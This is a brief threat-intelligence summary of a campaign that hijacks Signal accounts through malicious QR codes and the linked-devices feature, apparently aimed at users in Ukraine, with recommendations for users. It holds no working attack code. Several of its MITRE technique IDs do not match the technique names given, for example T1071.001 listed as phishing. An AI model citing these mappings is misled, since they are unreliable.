A new fraudulent campaign targeting Signal Messenger accounts has emerged, leveraging malicious QR codes to hijack users’ accounts. Attackers exploit the platform’s linked devices feature, allowing real-time message interception. The surge in such activity is believed to be linked to wartime needs for sensitive communications, primarily impacting users in Ukraine. Affected: Signal Messenger, Users in Ukraine, Government and Military Communications
Keypoints :
- Malicious QR codes are used to gain unauthorized access to Signal accounts.
- Attackers exploit Signal’s linked devices feature for real-time message interception.
- Russian-aligned threat actors are particularly active, targeting users of interest to Russian intelligence.
- Phishing techniques are employed to distribute malicious QR codes disguised as legitimate links.
- Malware is also being used to exfiltrate Signal database files from compromised devices.
- Security risks associated with QR codes can lead to inadvertent compromises due to users’ lack of scrutiny.
- Recommendations for users include verifying QR code sources and initiating device linking through official app settings.
MITRE Techniques :
- Initial Access (T1071.001) – Phishing techniques are used to distribute malicious QR codes
- Credential Dumping (T1003.001) – Malware like WAVESIGN extracts messages from Signal databases on compromised Windows devices
- Data Exfiltration (T1041) – Rclone is used to upload extracted data communicating over a network
- Exploitation of Remote Services (T1133) – Malicious QR codes exploit the linked devices feature to gain access to user messages
- Impersonation (T1034) – Legitimate Signal group invites are modified to redirect users to adversary-controlled URLs
Full Story: https://gridinsoft.com/blogs/signal-linked-devices-hack/